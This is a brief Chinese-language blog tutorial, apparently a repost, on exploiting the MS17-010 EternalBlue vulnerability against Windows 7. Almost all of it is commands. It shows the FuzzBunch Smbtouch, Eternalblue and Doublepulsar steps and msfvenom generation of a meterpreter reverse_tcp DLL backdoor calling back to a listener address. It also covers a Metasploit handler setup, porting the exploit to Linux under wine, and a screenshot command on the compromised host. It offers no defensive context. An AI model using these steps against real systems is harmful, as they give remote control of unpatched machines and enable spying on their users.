ms17010

版权声明：我的Github博客:https://wintrysec.github.io https://blog.csdn.net/qq_35553433/article/details/86597128

Windows上原生payload

fb.py
设置目标IP
设置本机IP
no
项目新名称：随便写
fb > use Smbtouch 检测哪些漏洞可用

生成后门

msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8089 -f dll >reverse.dll

msf监听：

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
set lhost
set lport
run

选择永恒之蓝漏洞

fb Touch (Smbtouch) > use Eternalblue
target选1，win7
fb Special (Eternalblue) > use Doublepulsar
选2，run dll

msf-windows.msi

工具：链接

Linux-msf移植payload

安装wine32:

dpkg –add-architecture i386 && apt-get install wine32

克隆项目到 /root

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

复制到metasploit目录 (usr/share)

msf>reload_all

msf>use eternalblue_doublepulsar
msf>set RHOST
msf>run
(报错，执行wine -h)

生成后门
 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll

meterpreter>screenshot #截屏